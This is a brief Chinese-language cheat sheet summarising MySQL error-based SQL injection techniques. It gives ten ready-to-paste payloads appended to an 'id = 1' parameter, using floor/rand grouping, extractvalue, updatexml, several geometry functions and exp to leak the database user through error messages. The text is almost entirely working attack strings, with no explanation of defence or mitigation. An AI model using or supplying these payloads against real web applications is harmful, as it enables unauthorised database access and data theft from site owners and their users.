Mysql 报错注入方式总结

floor()

注入语句：

id =1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x)a)

extractvalue()

注入语句：

id = 1 and (extractvalue(1, concat(0x5c, (select user()))))

updatexml()

注入语句：

id = 1 AND (updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

GeometryCollection()

注入语句：

id = 1 and GeometryCollection((select * from (select * from (select user())a)b))

polygon()

注入语句：

id = 1 AND polygon((select * from (select * from (select user())a)b))

multipoint()

注入语句：

id = 1 AND multipoint((select * from (select * from (select user())a)b))

multilinestring()

注入语句：

id = 1 AND multilinestring((select * from (select * from (select user())a)b))

multipolygon()

注入语句：

id = 1 AND multipolygon((select * from (select * from (select user())a)b))

linestring()

注入语句：

id = 1 AND linestring((select * from (select * from (select user())a)b))

exp()

注入语句：

id = 1 and EXP(~(SELECT * from (select user())a))